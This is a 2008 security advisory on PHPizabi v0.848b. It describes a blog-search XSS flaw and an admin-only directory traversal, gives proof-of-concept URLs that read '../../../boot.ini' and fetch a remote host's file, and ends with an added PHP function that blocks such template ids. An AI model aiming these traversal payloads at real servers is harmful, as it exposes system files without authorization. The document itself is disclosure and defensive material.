phpizabi-traverse.txt

Date: 16 Aug 2008 | Reported by: Lostmon | Type: packetstorm | Source: packetstormsecurity.com

PHPizabi v0.848b traversal file access allows remote folder enumeration and potential traversal file access.

Code
`##########################################  
PHPizabi v0.848b traversal file access  
Vendor url:http://www.phpizabi.net/  
Advisory: http://lostmon.blogspot.com/2008/08/phpizabi-v0848b-traversal-file-access.html  
Vendor notify: no  Exploit available: yes  
##########################################  
  
############################  
Description By vendor page:  
############################  
  
PHPizabi is one of the most powerful social networking  
platforms on the planet. With literally thousands of  
websites powered by PHPizabi including everything from  
simple friends sites to the most complex networking  
super sites out there. Easy to install, use, and raising  
the bar on what it is to provide a reliable, fast, social  
networking package to raise your business to the next level.  
  
##########################  
Vulnerability description  
##########################  
PHPizabi contains a flaw that allows remote arbitrary folder  
enumeration via directory traversal. This flaw exists because the  
application does not validate the 'query' variable upon submission  
to the 'index.php' script when the 'L' param is set to 'blogs.search'.  
This could allow a remote user to create a specially crafted  
URL that would use '../' directory traversal characters to  
view folder files on the target system with the privileges  
of the target web service.  
  
  
#################  
Versions  
#################  
  
PHPizabi v0.848b C1 HFP3  
  
  
###################  
Solution  
###################  
  
At this moment there is no solution for the traversal vulnerability.  
  
To fix the XSS issue in the blog search, update to SP3  
of this system:  
  
Download sp3:  
http://online.phpizabi.net/distribution/0848bC1_HFP3.zip  
  
  
###################  
Timeline  
##################  
  
Discovered: 10-08-2008  
Vendor notify: 14-08-2008  
Vendor response:  
Public disclosure: 15-08-2008  
  
###################  
Proof of Concept.  
###################  
  
#############  
XSS  
#############  
  
If the site does not have 848 Core HotFix Pack 3  
(0848bC1_HFP3.zip) installed, the system has an XSS hole in the  
query variable upon submission to the index.php script when the  
L param is set to blogs.search:  
  
http://localhost/phpizabi/index.php?L=blogs.search&query=  
[XSS-CODE]boolean=or&sin%5B%5D=title&sin  
%5B%5D=body&order=natural&direction=asc  
  
  
#####################  
Traversal file access  
#####################  
  
To exploit this issue, the attacker  
needs an Admin account.  
  
http://localhost/phpizabi/index.php?L=  
admin.templates.edittemplate&id=../../../boot.ini  
  
We can also 'view' the HTML source code generated by  
a remote server, like:  
  
http://localhost/phpizabi/index.php?  
L=admin.templates.edittemplate  
&id=http://[Remote-HOST]/folder/file.php  
  
But I don't know if we can do something with this...  
  
  
############## €nd ###################  
  
Thnx To estrella to be my light  
Thnx to all Lostmon Team !  
thnx to imydes From www.imydes.com  
--   
Sincerely:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
Curiosity is what moves the mind....  
`
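
The advisory lists no fix for the traversal. One way an application could constrain an `id` value like the one in the proof of concept, shown as an added example that is not PHPizabi code and not part of the advisory; `resolveTemplatePath()` and the template directory layout are assumptions:

```php
<?php
// Added example (not PHPizabi code): resolve a template "id" request value
// to a file inside one directory. resolveTemplatePath() and the directory
// layout are hypothetical.

function resolveTemplatePath(string $id, string $baseDir): ?string
{
    // Accept a bare file name only. Slashes, backslashes, colons, NUL bytes
    // and a leading dot are all outside this character set, so both
    // "../../../boot.ini" and "http://host/file.php" stop here.
    if (!preg_match('/\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}\z/', $id)) {
        return null;
    }

    // Resolve symlinks and confirm the result is still under the base
    // directory before anything opens the file.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $id);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary template root holding one file, then the
// two id shapes from the proof of concept plus one legitimate name.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
mkdir($root);
file_put_contents($root . DIRECTORY_SEPARATOR . 'header.tpl', '<h1>demo</h1>');

$samples = ['header.tpl', '../../../boot.ini', 'http://[Remote-HOST]/folder/file.php'];
foreach ($samples as $id) {
    $resolved = resolveTemplatePath($id, $root);
    printf("%-40s %s\n", $id, $resolved === null ? 'rejected' : 'ok: ' . $resolved);
}

unlink($root . DIRECTORY_SEPARATOR . 'header.tpl');
rmdir($root);
```

The name check and the `realpath()` containment check are independent layers: the first rejects separators and URL schemes, the second catches symlinks that point outside the template directory.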
